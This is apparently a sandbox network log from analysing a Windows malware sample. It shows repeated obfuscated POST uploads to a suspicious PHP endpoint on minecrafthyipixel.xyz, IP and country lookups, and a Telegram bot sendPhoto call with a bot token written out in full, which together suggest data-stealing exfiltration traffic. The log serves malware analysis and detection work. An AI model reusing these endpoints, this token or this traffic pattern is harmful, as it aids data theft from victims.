                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFDI24jH4HEu5AosAWegMrOZVZjUEd1vpgTFsBtTB42SBOwwl179nuO6waSAjfb1GrD5OdTnbU%2BISJlphsY8AqzGIpmVChgEPAkWOUf0qVhOnKiLYrVrrHhrTFpef3tjm2sFuFEkuhE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4a67d746768-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:32.171679974 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
186 | 192.168.2.4 | 49940 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:32.388678074 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:32.494462967 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:32.494594097 CEST | 2512 | OUT | Data Raw: 52 5a 5b 5e 59 42 54 5f 5c 5e 59 59 57 50 58 59 54 57 5f 5c 54 5e 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[^YBT_\^YYWPXYTW_\T^S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2.S6?0V+\3=P?(#^2901+*W72->;84<\.$[. X
Apr 19, 2024 13:44:32.764496088 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:32 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p7kChT1N6L0ObFyUxNimQSs2fMOwzXJoMdVNBGuHKnRtMaMTzOqo%2FETw3iOmFcjIoesnBj9KLT65RPGrtTCPxviCyUN8tMWwilq6NkCNkIMHBpjUmpGml8c4lJ0Fkbd6%2BhNBa5Ie3dw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4aac9d3674a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:32.764554977 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
187 | 192.168.2.4 | 49941 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:32.984417915 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:33.089418888 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:33.089554071 CEST | 2512 | OUT | Data Raw: 52 58 5e 5c 59 4b 54 5f 5c 5e 59 59 57 55 58 52 54 54 5f 58 54 58 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^\YKT_\^YYWUXRTT_XTXS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\2.)5+<30;0;.=+#]':<U21#!=+;7 8.$[. X -
Apr 19, 2024 13:44:33.461630106 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:33 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8dem7EX22mW82mjUlIq0US5A6JWeaTyMI%2F3CZhIA3Se98LC46ligoutfL46lPNiBwRgbBdUMc5msNsd4S0fS7qeCzS8Qm7pvT0fKYrALg1XqclcN3h%2FOheZvxgu5UoY6aTPvtrv21I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4ae7c8ead76-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:33.461688042 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
188 | 192.168.2.4 | 49942 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:33.686579943 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:33.792372942 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:33.792742014 CEST | 2504 | OUT | Data Raw: 57 55 5b 58 59 41 54 59 5c 5e 59 59 57 57 58 5f 54 5b 5f 5a 54 5b 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[XYATY\^YYWWX_T[_ZT[S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&>R6'$#$3;"=8 1T%- +($"/;-5$[. X 5
Apr 19, 2024 13:44:34.140918016 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CtGWHGsItuTKGgkyfTI%2FJ2qjnZ2rJ5EtFYqNo7QgzrgcsRhdU4QjvjARpKl9AP0Ccygu2wF4rM3KAedhRpLMoX2%2BmL%2FkpEFHC9nw1jkXueZfjELCZsaCipCutSrDXbR%2FDwXtuWgQnE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4b2eccb17fb-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:34.140981913 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
189 | 192.168.2.4 | 49943 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:34.357920885 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:34.462258101 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:44:34.462428093 CEST | 2512 | OUT | Data Raw: 52 59 5b 5c 5c 44 54 58 5c 5e 59 59 57 51 58 5c 54 55 5f 56 54 5b 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY[\\DTX\^YYWQX\TU_VT[S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>2!;?' 33;=?(+X&)32) 25+;'4#.$[. X =
Apr 19, 2024 13:44:34.735208035 CEST | 619 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69Uwd7MyyK9uwHaDuQUv%2BpNZuGGG2hsIdhxzqxG4i%2FYuUUTAcMm8giJHe4Nq2SvPK%2BkfEZuUsw9smghhWMqSYLAW5EB7tiiP95ZbBNLQyl4M5LnGw55amqsO8EZLMGUyfpYym4h6STY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4b71bdf4590-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:34.735271931 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
190 | 192.168.2.4 | 49944 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:34.973005056 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:35.077496052 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:35.077708960 CEST2512OUTData Raw: 52 5a 5e 5b 5c 40 51 58 5c 5e 59 59 57 53 58 5c 54 51 5f 5c 54 55 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^[\@QX\^YYWSX\TQ_\TUS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&>!"Y''^$*'\%:0U2]>W72)*('4+.$[. X 5
Apr 19, 2024 13:44:35.337918043 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:35 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xr%2Fm1vMJOfHnfiFRNPpw1abrCTmZ76%2BzO2Msmh7LX5nRgC5uKPENHAJGza%2BrO%2FccKo6oc4WFStiew7YpKD1CwlETkDNmC3jcspiA9zJV8btO3kkgFTyBkNu8lyh%2BRL%2BoACtNJqD%2FFyo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4baeb8812d6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:35.337981939 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
191 | 192.168.2.4 | 49945 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:35.561846972 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:35.667648077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:35.667917013 CEST2512OUTData Raw: 52 5e 5e 59 59 42 51 58 5c 5e 59 59 57 5e 58 5b 54 57 5f 59 54 54 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^YYBQX\^YYW^X[TW_YTTS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-6"8[& 0;V?((2)+%]-41==#7, [.5$[. X


Session ID | Source IP | Source Port | Destination IP | Destination Port
192 | 192.168.2.4 | 49946 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:35.915833950 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:44:36.020354986 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:36.023571014 CEST2192OUTData Raw: 52 59 5e 59 59 4a 54 54 5c 5e 59 59 57 5e 58 53 54 5a 5f 56 54 5b 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^YYJTT\^YYW^XSTZ_VT[SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]&%"$$$'+-?(81?&6#2>'_ Z8.$[. X
Apr 19, 2024 13:44:36.386240005 CEST | 772 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h0G2e4eS1VSA%2FX27e4ZXZAvhHF2j4CvkP7GCz1k1u6GqiUbTRq6c1yf39Bg3tJ7%2BWWEas%2FFOaZTfeURlyBeSebOMA8Sh%2BDLMUyYjwC9AdzUUgDhX4AnmX0X1wW3ewGIr%2Bf0erpyxQho%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4c0ddc178d1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5d 33 25 31 05 21 3a 2b 5a 3e 33 25 03 3e 09 3a 04 3e 17 07 17 23 2d 12 1f 2f 3a 37 00 3e 2b 22 15 26 23 31 19 27 3d 30 51 31 30 21 59 00 1a 39 5f 23 12 3d 1f 2d 2a 2e 01 3c 0f 29 5b 34 21 33 17 28 2d 31 50 37 3b 33 18 28 00 21 50 38 28 33 0e 2b 28 26 03 38 0e 26 58 20 3b 2c 52 09 12 26 08 3f 28 28 10 25 0e 25 1d 23 21 3c 1e 3c 01 00 11 25 38 24 12 26 23 38 5e 2d 21 22 51 31 00 26 0d 2a 3a 2c 56 34 3c 08 0b 24 2e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$]3%1!:+Z>3%>:>#-/:7>+"&#1'=0Q10!Y9_#=-*.<)[4!3(-1P7;3(!P8(3+(&8&X ;,R&?((%%#!<<%8$&#8^-!"Q1&*:,V4<$..^,+H0TW
Apr 19, 2024 13:44:36.386298895 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
193 | 192.168.2.4 | 49947 | 104.21.57.61 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:44:36.064654112 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:44:36.170178890 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:36.175318003 CEST2512OUTData Raw: 52 5e 5b 59 59 41 51 5d 5c 5e 59 59 57 56 58 5d 54 5a 5f 5f 54 58 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[YYAQ]\^YYWVX]TZ__TXS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%*U!(\'40;T?(0&<T%6S416)?##.$[. X !
Apr 19, 2024 13:44:36.438750982 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EDew04V4Vq%2B9MPEATvaPyi7bTm6zwaK%2BYwtKtOykbIfdU6vmHfjyLGoQKCJkiSLleZg9UpQcNmm85%2BLZbloUAgSdT8%2B9x3PRVl5VZ7t3wFpTaDm0e8hfcm3yTEhvSsMKMEc3VqisEhE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4c1bff8ad6b-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:44:36.438810110 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 34.117.186.192 | 443 | 6988 | C:\Users\user\Desktop\W4tW72sfAD.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 11:41:58 UTC | 61 | OUT | GET /ip HTTP/1.1
                                                                                                                                    Host: ipinfo.io
                                                                                                                                    Connection: Keep-Alive
2024-04-19 11:41:58 UTC | 361 | IN | HTTP/1.1 200 OK
                                                                                                                                    server: nginx/1.24.0
                                                                                                                                    date: Fri, 19 Apr 2024 11:41:58 GMT
                                                                                                                                    content-type: text/plain; charset=utf-8
                                                                                                                                    Content-Length: 12
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                    via: 1.1 google
                                                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Connection: close
2024-04-19 11:41:58 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                                                                                    Data Ascii: 81.181.57.52


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 34.117.186.192 | 443 | 6988 | C:\Users\user\Desktop\W4tW72sfAD.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 11:41:59 UTC | 42 | OUT | GET /country HTTP/1.1
                                                                                                                                    Host: ipinfo.io
2024-04-19 11:41:59 UTC | 504 | IN | HTTP/1.1 200 OK
                                                                                                                                    server: nginx/1.24.0
                                                                                                                                    date: Fri, 19 Apr 2024 11:41:59 GMT
                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                    Content-Length: 3
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                    x-envoy-upstream-service-time: 2
                                                                                                                                    via: 1.1 google
                                                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Connection: close
2024-04-19 11:41:59 UTC | 3 | IN | Data Raw: 55 53 0a
                                                                                                                                    Data Ascii: US


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | 6988 | C:\Users\user\Desktop\W4tW72sfAD.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 11:42:00 UTC | 256 | OUT | POST /bot6499149886:AAEaWHYhZxpFDZTcqGoOIgb5aWoEwpeON7Q/sendPhoto HTTP/1.1
                                                                                                                                    Content-Type: multipart/form-data; boundary="375a82a9-434c-43d0-8d25-c0ccd816cce2"
                                                                                                                                    Host: api.telegram.org
                                                                                                                                    Content-Length: 100984
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-04-19 11:42:00 UTC40OUTData Raw: 2d 2d 33 37 35 61 38 32 61 39 2d 34 33 34 63 2d 34 33 64 30 2d 38 64 32 35 2d 63 30 63 63 64 38 31 36 63 63 65 32 0d 0a
                                                                                                                                    Data Ascii: --375a82a9-434c-43d0-8d25-c0ccd816cce2
